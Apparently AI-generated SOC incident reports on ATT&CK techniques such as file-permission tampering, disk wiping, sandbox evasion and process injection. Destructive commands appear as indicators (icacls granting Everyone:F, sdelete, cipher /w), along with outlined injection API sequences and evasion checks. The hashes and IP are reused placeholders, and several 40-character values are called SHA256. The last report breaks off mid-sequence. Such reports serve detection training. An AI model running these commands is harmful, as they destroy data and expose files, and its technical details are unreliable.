4. Admin Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
5. Network Block
Block attacker IP
Palo Alto
185.143.221[.]89 blocked
6. Access Verification
Verify users can access shares
Testing
Access restored
Jira Incident Report
Ticket: SOC-2024-173 Summary: T1222 – Mass Permission Modification on File Shares Status: RESOLVED Resolution: MALICIOUS – Permissions Restored Priority: P2 – MEDIUM Labels: T1222, permissions-modification, icacls, sysmon, compromised-admin Components: Data-Security, Access-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “File Permissions Modification via icacls/cacls”.
Host: FILESRV-01 (File Server).
Actions: Permissions changed on finance, HR, R&D shares.
Time: 2024-03-05 11:30 EST.
Technique: MITRE ATT&CK T1222.001 – File and Directory Permissions Modification: Windows File and Directory Permissions Modification.
2. Technical Analysis:
Attack Chain:
10:30 – Admin account (jsmith) compromised via phishing
10:45 – Attacker logs into admin workstation via RDP
11:00 – Attacker uses psexec to run icacls commands
11:15-11:30 – Permission modifications on shares
11:30 – Sysmon detects
Permission Changes:
Finance Share: Denied access to Domain Users, Authenticated Users; removed Finance Team; granted Everyone:F
HR Share: Denied access to Domain Users, Authenticated Users; granted Everyone:F
R&D Share: Denied access to Domain Users; granted Everyone:F
Impact:
All domain users locked out of finance, HR, R&D shares
Everyone (including anonymous) granted full control (extremely insecure)
Data exposed to anyone on network
Attacker Intent:
Lock out legitimate users (disruption)
Grant themselves access (already had admin)
Possibly prepare for data theft
3. Investigation Findings:
Timeline:
10:30 – Admin account compromised
10:45 – Attacker logs in
11:00-11:30 – Permission modifications
11:30 – Sysmon alert
11:32 – SOC investigates
11:33 – Admin account disabled
11:35 – Permissions restored
Indicators of Compromise (IoCs):
Commands:
– icacls \\filesrv\finance /deny “Domain Users:(R,W)”
– icacls \\filesrv\finance /remove “Finance Team”
– icacls \\filesrv\finance /grant “Everyone:F”
– (similar for HR and R&D)
Account:
– jsmith (compromised admin)
4. Containment Actions:
Immediate Actions:
Disabled compromised admin account.
Restored permissions from backup policy (using PowerShell).
Removed Everyone:F access.
Re-added Domain Users and Finance Team with appropriate permissions.
Verified access restored.
Account Remediation:
Reset jsmith password.
Enforced MFA.
Data Protection:
Checked for data exfiltration (none).
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to modify share permissions.
No alerting for permission changes.
6. Business Impact:
Operational Impact: Users locked out of shares for 20 minutes.
Data Exposure: Potential exposure during window (Everyone:F). No evidence of exfiltration.
7. Remediation & Prevention:
Completed Actions:
Permissions restored.
Account secured.
Access verified.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for icacls/cacls usage on shares.
Implemented change management for permission modifications.
8. Conclusion:
An attacker compromised an admin account and modified permissions on critical file shares, locking out legitimate users and granting Everyone full control. Sysmon detected the icacls commands, enabling rapid restoration of correct permissions.
Closure Rationale: Permissions restored; account secured; no data loss.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 12:30 EST
134. T1561 – Disk Wipe (Carbon Black Detection)
Carbon Black Alert Details
Alert ID: CB-DISK-WIPE-1561-7842 Alert Time: 2024-03-05 16:30:45 EST Severity: CRITICAL (99/100) Source: VMware Carbon Black Cloud Rule: “Disk Wiping Activity Detected – Raw Disk Access” MITRE ATT&CK: T1561.001 – Disk Wipe: Disk Content Wipe
Alert Details:
Detection: Process overwriting disk sectors with raw write access
Host: SQL-SRV-01 (Primary SQL Server) User: SYSTEM (via compromised admin) Time: 16:15-16:30 EST
Process Details:
Process: C:\Windows\Temp\wipe.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: psexec.exe (from admin workstation)
Disk Activity:
Raw write access to \.\PhysicalDrive0 (system disk)
Overwriting sectors 0-10,000 with zeros
MBR (Master Boot Record) overwritten
Partition table corrupted
Data on C: drive being wiped sequentially
Additional Tools:
sdelete.exe -c (clean free space)
cipher.exe /w (wipe free space)
Detection Logic:
Process with raw disk write access (unusual)
Overwriting disk sectors (not just files)
MBR overwritten (system unbootable)
Pattern matches destructive disk wipe attack
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Carbon Black alert
Carbon Black Console
Confirmed disk wiping activity
2. Immediate Action
Power off server
Remote Console
Server shut down to prevent further damage
3. Process Investigation
Identify source
CrowdStrike Falcon
psexec from compromised admin workstation
4. Admin Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
5. Data Recovery
Restore from backups
Veeam Backup
Full server restore from previous night’s backup
6. Incident Response
Activate disaster recovery
Management, Legal
Data destruction incident declared
Jira Incident Report
Ticket: SOC-2024-174 Summary: T1561 – Disk Wipe Attack on SQL Server (MBR Overwritten) Status: RESOLVED Resolution: MALICIOUS – Data Destroyed, Restored from Backups Priority: P1 – CRITICAL Labels: T1561, disk-wipe, raw-disk-access, carbon-black, compromised-admin Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: VMware Carbon Black Cloud.
Alert: “Disk Wiping Activity Detected – Raw Disk Access”.
Host: SQL-SRV-01 (Primary SQL Server).
Action: Overwriting disk sectors, MBR destroyed.
Time: 2024-03-05 16:30 EST.
Technique: MITRE ATT&CK T1561.001 – Disk Wipe: Disk Content Wipe.
2. Technical Analysis:
Attack Chain:
15:30 – Admin account (jwilson) compromised via phishing
15:45 – Attacker logs into admin workstation via RDP
16:00 – Attacker uses psexec to deploy wipe.exe to SQL server
16:05 – wipe.exe executed with SYSTEM privileges
16:05-16:30 – Disk wiping in progress (MBR overwritten, data wiped)
16:30 – Carbon Black detects
Wipe Tool Analysis:
Name: wipe.exe (custom disk wiper)
SHA256: a1b2c3d4…
Function: Opens physical drive \.\PhysicalDrive0 with write access, overwrites sectors with zeros
Progress: Overwrote first 10,000 sectors (MBR + partition table + beginning of data)
Damage:
MBR destroyed (system unbootable)
Partition table lost
SQL data files partially overwritten (beginning of drive)
System unrecoverable without full restore
Attacker Intent:
Maximum destruction
Prevent recovery
Likely part of destructive attack (wiper)
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:00 – wipe.exe deployed
16:05-16:30 – Disk wiping
16:30 – Carbon Black alert
16:32 – SOC investigates
16:33 – Server powered off
16:35 – Admin account disabled
16:40 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\wipe.exe (SHA256: a1b2c3d4…)
Disk Activity:
– Raw write to \\.\PhysicalDrive0
– MBR overwritten
Account:
– jwilson (compromised admin)
4. Containment Actions:
Immediate Actions:
Powered off SQL server to prevent further wiping.
Disabled compromised admin account.
Reset admin password.
Blocked attacker IP.
Data Recovery:
Restored SQL server from previous night’s Veeam backup (16 hours old).
Data loss: Transactions between 00:00 and 16:30 (16.5 hours).
Restored to new VM to ensure clean state.
Business Impact Mitigation:
Declared data breach (data loss).
Notified affected business units.
Recovered database from backup.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had ability to deploy tools to servers.
No alerting for raw disk access.
6. Business Impact:
Operational Impact: SQL server offline for 4 hours (restore time).
Data Loss: 16.5 hours of transactions lost.
Financial Impact: Significant (lost transactions, recovery costs).
7. Remediation & Prevention:
Completed Actions:
Server restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Blocked raw disk access for non-system processes.
Enhanced Carbon Black monitoring for raw disk writes.
8. Conclusion:
An attacker compromised an admin account and deployed a disk wiper on the primary SQL server, overwriting the MBR and partially destroying data. Carbon Black detected the raw disk access, enabling shutdown before complete destruction. The server was restored from backup with 16.5 hours of data loss.
Closure Rationale: Data partially destroyed; server restored from backup; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 18:00 EST
135. T1497.001 – System Checks (Sandbox Evasion) – FortiSandbox Detection
FortiSandbox Alert Details
Alert ID: FORTI-SANDBOX-EVASION-1497-7842 Alert Time: 2024-03-05 10:30:22 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “Sandbox Evasion Techniques Detected – System Checks” MITRE ATT&CK: T1497.001 – System Checks (Virtualization/Sandbox Evasion)
Alert Details:
File Analysis Report:
File Name: invoice_7842.docm (email attachment)
File Size: 2.4 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email to finance@company.com
Submission Time: 10:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Malware performed multiple system checks before revealing malicious behavior:
Check 1: VMware Detection
Checked for presence of VMware tools: C:\Windows\System32\drivers\vmhgfs.sys (found → exit)
Checked for VMware registry keys: HKLM\SOFTWARE\VMware, Inc.\ (found → exit)
Check 2: Sandbox Hostname Detection
Enumerated computer name: “SANDBOX-01” (found → exit)
Checked for “ANALYSIS” in computer name (found → exit)
Check 3: CPU Core Count
Get-Processor Cores: 1 core (less than 2 → exit)
Check 4: RAM Size
Get-WMI Win32_ComputerSystem | TotalPhysicalMemory: 1.5 GB (less than 2GB → exit)
Check 5: Disk Size
Get-WMI Win32_LogicalDisk | Size: 40 GB (less than 60GB → exit)
Check 6: Debugger Detection
IsDebuggerPresent API call (detected → exit)
NtQueryInformationProcess with ProcessDebugPort (detected → exit)
Check 7: Sleep Calls
Long sleep (10 minutes) to bypass time-based sandboxes
After sleep, performed same checks again
Check 8: Mouse Movement Detection
Checked for mouse movement (no movement in sandbox → exit)
Forced Analysis:
After 15 minutes of evasion, sandbox forced deeper analysis
Malware eventually decrypted payload: Cobalt Strike beacon
Connected to 185.143.221[.]89:443
Detection Logic:
Multiple evasion techniques detected
Malware refused to run in sandbox environment
System checks indicate advanced evasion
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed sandbox evasion techniques
2. Email Investigation
Find source email
Proofpoint, Exchange
Email to finance@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block C2 IP and URL
Palo Alto, Cisco Umbrella
185.143.221[.]89 blocked
6. Threat Hunting
Check for similar files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-175 Summary: T1497.001 – Malware with Sandbox Evasion Techniques Detected Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1497, sandbox-evasion, system-checks, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Sandbox Evasion Techniques Detected – System Checks”.
File: invoice_7842.docm (email attachment).
Target: Finance Department.
Time: 2024-03-05 10:30 EST.
Technique: MITRE ATT&CK T1497.001 – System Checks (Virtualization/Sandbox Evasion).
2. Technical Analysis:
Attack Chain:
10:10 – Email sent from “vendor@payment-update[.]net”
10:11 – Email delivered to finance@company.com
10:12 – FortiSandbox analyzes attachment (inline)
10:15 – Analysis begins
10:15-10:30 – Malware performs evasion checks, exits
10:30 – Sandbox forces deeper analysis, reveals payload
10:30 – Alert triggers
10:31 – Email quarantined
Evasion Techniques Used:
VMware Detection: Checks for VMware tools, registry keys
Sandbox Hostname Detection: Looks for “SANDBOX”, “ANALYSIS”
Resource Checks: CPU <2 cores, RAM <2GB, disk <60GB
Debugger Detection: IsDebuggerPresent, NtQueryInformationProcess
Timing: Long sleep (10 minutes)
Human Interaction: Checks for mouse movement
True Payload:
After evasion, decrypted Cobalt Strike beacon
C2: 185.143.221[.]89:443
Persistence via scheduled task
Capabilities: Keylogging, credential theft, file exfiltration
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.docm (macro-enabled)
3. Investigation Findings:
Timeline:
10:10 – Email sent
10:11 – Email delivered
10:12-10:30 – FortiSandbox analysis
10:30 – Alert triggers
10:31 – Email quarantined
10:32 – SOC investigates
10:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.docm (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
Evasion:
– VMware checks, resource checks, debugger detection, long sleep
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block macro-enabled documents from external senders.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware with evasion techniques.
Contributing Factors:
Macro-enabled documents allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all macro-enabled documents from external sources.
Enabled FortiSandbox inline analysis for all emails.
Created alert for sandbox evasion techniques.
8. Conclusion:
A sophisticated malware used multiple sandbox evasion techniques, including system checks for VMware, resources, debuggers, and human interaction. FortiSandbox detected the evasion and forced deeper analysis, revealing the Cobalt Strike payload. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 11:30 EST
End of Batch 27
Ready for your next batch of prompts whenever you are.
Batch 28: Process Injection Incident Reports
Here are the next 5 detailed SOC incident reports covering T1055 and its sub-techniques.
136. T1055 – Process Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PROC-INJECT-1055-7842 Alert Time: 2024-03-06 09:30:15 EST Severity: CRITICAL (95/100) Source: CrowdStrike Falcon EDR Rule: “Process Injection Detected – Remote Thread Creation” MITRE ATT&CK: T1055 – Process Injection
Alert Details:
Detection: Process created remote thread in another process (code injection)
Source Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Target Process: explorer.exe (PID: 2341) Time: 09:25 EST
API Call Sequence:
09:25:10 – OpenProcess (target: explorer.exe, access: PROCESS_ALL_ACCESS) – SUCCESS
09:25:12 – VirtualAllocEx (allocated 4096 bytes in explorer.exe) – SUCCESS
09:25:15 – WriteProcessMemory (wrote shellcode to allocated memory) – SUCCESS
09:25:18 – CreateRemoteThread (created thread in explorer.exe at shellcode address) – SUCCESS
09:25:20 – Thread executing in explorer.exe (PID: 2341, TID: 4789)
Source Process:
Process: C:\Users\bturner\AppData\Local\Temp\update.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe (legitimate)
User: bturner
Shellcode Analysis (extracted):
4096 bytes of position-independent code
Connects to 185.143.221[.]89:443
Downloads additional payload
Injects into additional processes
Detection Logic:
Process injecting code into another process (unusual)
CreateRemoteThread to explorer.exe (common target)
Source process from Temp folder (suspicious)
Pattern matches malware injection technique
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed process injection
2. Memory Analysis
Extract injected shellcode
CrowdStrike Falcon Memory
Reverse shell to C2
3. Process Investigation
Identify source of injection
CrowdStrike
update.exe from phishing email
4. Immediate Action
Terminate malicious processes
CrowdStrike
update.exe and injected thread killed
5. Host Isolation
Isolate FIN-WS-078
CrowdStrike
Host quarantined
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-176 Summary: T1055 – Process Injection into explorer.exe from Malicious Executable Status: RESOLVED Resolution: MALICIOUS – Injection Blocked Priority: P1 – CRITICAL Labels: T1055, process-injection, create-remote-thread, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Injection Detected – Remote Thread Creation”.
Source Process: C:\Users\bturner\AppData\Local\Temp\update.exe.
Target Process: explorer.exe (PID: 2341).
Time: 2024-03-06 09:30 EST.
Technique: MITRE ATT&CK T1055 – Process Injection.
2. Technical Analysis:
Attack Chain:
09:00 – User opens phishing email attachment
09:05 – update.exe downloaded and executed
09:10 – Malware enumerates running processes
09:15 – Selects explorer.exe as injection target
09:25 – Process injection using CreateRemoteThread
09:25 – CrowdStrike detects
Injection Details:
Method: Classic DLL injection via CreateRemoteThread
Memory Allocated: 4096 bytes in explorer.exe
Shellcode: Position-independent code (reverse shell)
C2: 185.143.221[.]89:443
Malware Analysis:
File: update.exe (SHA256: a1b2c3d4…)
Type: Cobalt Strike loader
Behavior: Injects shellcode, downloads additional payloads
Impact:
Malicious code running inside explorer.exe
Stealthier than running as separate process
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
09:00 – Phishing email opened
09:05 – Malware executed
09:10-09:15 – Reconnaissance
09:25 – Injection detected
09:27 – SOC investigates
09:28 – Processes terminated
09:29 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\update.exe (SHA256: a1b2c3d4…)
API Calls:
– OpenProcess (explorer.exe)
– VirtualAllocEx
– WriteProcessMemory
– CreateRemoteThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated update.exe process.
Terminated injected thread in explorer.exe.
Scanned explorer.exe memory (clean after thread termination).
Isolated host.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User executed malware from phishing email.
Contributing Factors:
No application control blocking unknown executables.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enabled ASR rule “Block process injections”.
Enhanced monitoring for CreateRemoteThread.
Implemented application control.
8. Conclusion:
An attacker used process injection to hide malicious code inside explorer.exe, evading detection. CrowdStrike detected the remote thread creation and enabled rapid termination before significant C2 communication.
Closure Rationale: Injection blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-06 10:30 EST
137. T1055.001 – Dynamic-link Library Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-DLL-INJECT-1055-7842 Alert Time: 2024-03-06 14:15:33 EST Severity: CRITICAL (96/100) Source: CrowdStrike Falcon EDR Rule: “DLL Injection Detected – LoadLibrary Remote Thread” MITRE ATT&CK: T1055.001 – Process Injection: Dynamic-link Library Injection
Alert Details:
Detection: Process forcing target process to load malicious DLL
Source Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Target Process: svchost.exe (PID: 568) Time: 14:10 EST
API Call Sequence:
14:10:10 – OpenProcess (target: svchost.exe, access: PROCESS_ALL_ACCESS) – SUCCESS
14:10:12 – VirtualAllocEx (allocated memory in svchost.exe for DLL path) – SUCCESS
14:10:15 – WriteProcessMemory (wrote “C:\Windows\Temp\crypt.dll” to allocated memory) – SUCCESS
14:10:18 – GetProcAddress (got address of LoadLibraryA in kernel32.dll) – SUCCESS
14:10:20 – CreateRemoteThread (target: svchost.exe, start: LoadLibraryA, param: DLL path) – SUCCESS
14:10:22 – LoadLibraryA called in svchost.exe, loading C:\Windows\Temp\crypt.dll
14:10:25 – Malicious DLL loaded in svchost.exe
Source Process:
Process: C:\Users\alexchen\Downloads\installer.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen
Malicious DLL:
Path: C:\Windows\Temp\crypt.dll
SHA256: c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2
Function: Exports legitimate crypt functions + backdoor
Detection Logic:
CreateRemoteThread with LoadLibraryA address (classic DLL injection)
Target svchost.exe (critical system process)
DLL from Temp folder (suspicious)
Pattern matches malware persistence via DLL injection
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed DLL injection into svchost.exe
2. DLL Analysis
Analyze crypt.dll
CrowdStrike Sandbox
Backdoor with C2 capabilities
3. Process Investigation
Terminate malicious thread
CrowdStrike
Remote thread killed; DLL unloaded
4. File Removal
Delete malicious DLL
CrowdStrike Live Response
crypt.dll deleted
5. Host Isolation
Isolate ENG-WS-045
CrowdStrike
Host quarantined
6. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-177 Summary: T1055.001 – DLL Injection into svchost.exe Status: RESOLVED Resolution: MALICIOUS – DLL Removed Priority: P1 – CRITICAL Labels: T1055, dll-injection, loadlibrary, svchost, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “DLL Injection Detected – LoadLibrary Remote Thread”.
Source Process: C:\Users\alexchen\Downloads\installer.exe.
Target Process: svchost.exe (PID: 568).
DLL: C:\Windows\Temp\crypt.dll.
Time: 2024-03-06 14:15 EST.
Technique: MITRE ATT&CK T1055.001 – Process Injection: Dynamic-link Library Injection.
2. Technical Analysis:
Attack Chain:
13:30 – User downloads “software installer” from torrent site
13:45 – Executes installer.exe
13:50 – Installer drops crypt.dll to Temp folder
14:00 – Installer enumerates processes, targets svchost.exe
14:10 – DLL injection via CreateRemoteThread + LoadLibraryA
14:10 – Malicious DLL loads in svchost.exe
14:15 – CrowdStrike detects
Injection Details:
Method: Classic DLL injection using LoadLibraryA
Target: svchost.exe (runs as SYSTEM)
DLL Path: C:\Windows\Temp\crypt.dll
Result: Malicious code running in SYSTEM context
Malicious DLL Analysis:
File: crypt.dll (SHA256: c3d4e5f6…)
Exports: Legitimate crypt functions (to avoid errors)
Backdoor: Hidden thread connects to 185.143.221[.]89:443
Capabilities: Reverse shell, keylogging, file access
Impact:
Attacker gained SYSTEM access via svchost.exe
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
13:30 – Installer downloaded
13:45 – Executed
13:50 – DLL dropped
14:00 – Process enumeration
14:10 – Injection
14:15 – Alert
14:17 – SOC investigates
14:18 – Thread terminated
14:19 – DLL deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\installer.exe (SHA256: b2c3d4e5…)
– C:\Windows\Temp\crypt.dll (SHA256: c3d4e5f6…)
API Calls:
– OpenProcess (svchost.exe)
– VirtualAllocEx
– WriteProcessMemory
– GetProcAddress (LoadLibraryA)
– CreateRemoteThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated remote thread in svchost.exe.
Unloaded malicious DLL from svchost.exe.
Deleted crypt.dll and installer.exe.
Isolated host.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted software.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
DLL removed.
Injection stopped.
Account secured.
Technical Controls Enhanced:
Enabled application control.
Enhanced monitoring for LoadLibrary remote threads.
Blocked unsigned DLLs from loading in system processes.
8. Conclusion:
An attacker used DLL injection to load a malicious backdoor into svchost.exe, gaining SYSTEM access. CrowdStrike detected the injection and enabled rapid removal before significant damage.
Closure Rationale: DLL removed; injection stopped; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-06 15:30 EST
138. T1055.002 – Portable Executable Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PE-INJECT-1055-7842 Alert Time: 2024-03-06 11:30:22 EST Severity: CRITICAL (97/100) Source: CrowdStrike Falcon EDR Rule: “PE Injection Detected – Executable Code in Remote Process” MITRE ATT&CK: T1055.002 – Process Injection: Portable Executable Injection
Alert Details:
Detection: Malicious PE file injected into memory of legitimate process
Source Host: SALES-WS-023 (Sales Workstation) User: mwilson@company.com (Mike Wilson, Sales Rep) Target Process: notepad.exe (PID: 1245) Time: 11:25 EST
API Call Sequence:
11:25:10 – CreateProcess (created notepad.exe suspended) – SUCCESS
11:25:12 – GetThreadContext (suspended thread) – SUCCESS
11:25:15 – VirtualAllocEx (allocated memory in notepad.exe) – SUCCESS
11:25:18 – WriteProcessMemory (wrote PE headers) – SUCCESS
11:25:21 – VirtualAllocEx (allocated memory for PE sections) – SUCCESS
11:25:24 – WriteProcessMemory (wrote PE sections) – SUCCESS
11:25:27 – SetThreadContext (modified thread to point to PE entry point) – SUCCESS
11:25:30 – ResumeThread (resumed notepad.exe, now running injected PE) – SUCCESS
Source Process:
Process: C:\Users\mwilson\AppData\Local\Temp\svchost.exe (PID: 4789)
SHA256: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3
Parent: explorer.exe
User: mwilson
Injected PE:
Type: Cobalt Strike beacon
Size: 256 KB
Entry Point: 0x1000 (within allocated memory)
Detection Logic:
Process created suspended (indicates injection)
PE headers written to remote process
Thread context modified (entry point changed)
Pattern matches PE injection (aka “process hollowing”)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed PE injection
2. Memory Analysis
Extract injected PE
CrowdStrike Falcon Memory
Cobalt Strike beacon
3. Process Investigation
Terminate injected process
CrowdStrike
notepad.exe terminated
4. Source Process Kill
Kill svchost.exe (malicious)
CrowdStrike
Process terminated
5. Host Isolation
Isolate SALES-WS-023
CrowdStrike
Host quarantined
6. Account Remediation
Disable mwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-178 Summary: T1055.002 – PE Injection (Process Hollowing) into notepad.exe Status: RESOLVED Resolution: MALICIOUS – Injected PE Removed Priority: P1 – CRITICAL Labels: T1055, pe-injection, process-hollowing, cobalt-strike, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “PE Injection Detected – Executable Code in Remote Process”.
Source Process: C:\Users\mwilson\AppData\Local\Temp\svchost.exe.
Target Process: notepad.exe (created suspended).
Injected PE: Cobalt Strike beacon.
Time: 2024-03-06 11:30 EST.
Technique: MITRE ATT&CK T1055.002 – Process Injection: Portable Executable Injection.
2. Technical Analysis:
Attack Chain:
11:00 – User clicks phishing link
11:05 – svchost.exe (malicious) downloaded to Temp
11:10 – Malware executed
11:15 – Malware enumerates system
11:20 – Decides to use process hollowing
11:25 – Creates notepad.exe suspended, injects PE
11:25 – CrowdStrike detects
Process Hollowing Technique:
Step 1: Create legitimate process in suspended state (notepad.exe)
Step 2: Allocate memory in target process
Step 3: Write malicious PE to allocated memory
Step 4: Modify thread context to point to PE entry point
Step 5: Resume thread – malicious code runs
Malicious PE:
Type: Cobalt Strike beacon
Size: 256 KB
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Impact:
Malicious code running inside notepad.exe
C2 connection established (blocked)
Stealthier than standalone executable
3. Investigation Findings:
Timeline:
11:00 – Phishing link clicked
11:05-11:10 – Malware downloaded and executed
11:15-11:20 – Reconnaissance
11:25 – Injection
11:25 – Alert
11:27 – SOC investigates
11:28 – notepad.exe terminated
11:29 – svchost.exe terminated
11:30 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\mwilson\AppData\Local\Temp\svchost.exe (SHA256: d4e5f6a7…)
API Calls:
– CreateProcess (suspended)
– GetThreadContext
– VirtualAllocEx (multiple)
– WriteProcessMemory (multiple)
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated injected notepad.exe process.
Terminated malicious svchost.exe.
Isolated host.
Disabled mwilson account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No ASR rule blocking process hollowing.
User had local admin rights.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Injected PE removed.
Malware terminated.
Account secured.
Technical Controls Enhanced:
Enabled ASR rule “Block process hollowing”.
Enhanced monitoring for CreateProcess with suspended flag.
8. Conclusion:
An attacker used process hollowing (PE injection) to run a Cobalt Strike beacon inside a legitimate notepad.exe process. CrowdStrike detected the injection technique and enabled rapid termination before C2 communication could complete.
Closure Rationale: Injected PE removed; malware terminated; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-06 12:30 EST
139. T1055.003 – Thread Execution Hijacking (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-THREAD-HIJACK-1055-7842 Alert Time: 2024-03-06 16:30:45 EST Severity: CRITICAL (96/100) Source: CrowdStrike Falcon EDR Rule: “Thread Hijacking Detected – APC Injection Variation” MITRE ATT&CK: T1055.003 – Process Injection: Thread Execution Hijacking
Alert Details:
Detection: Attacker suspended a thread and redirected its execution
Source Host: HR-WS-023 (HR Workstation) User: kwilson@company.com (Karen Wilson, HR) Target Process: explorer.exe (PID: 2341) Target Thread: TID 1245 (explorer.exe UI thread) Time: 16:25 EST
API Call Sequence:
16:25:10 – OpenThread (target: explorer.exe thread 1245) – SUCCESS
16:25:12 – SuspendThread (suspended target thread) – SUCCESS
16:25:15 – VirtualAllocEx (allocated memory in explorer.exe) – SUCCESS
16:25:18 – WriteProcessMemory (wrote shellcode to allocated memory) – SUCCESS
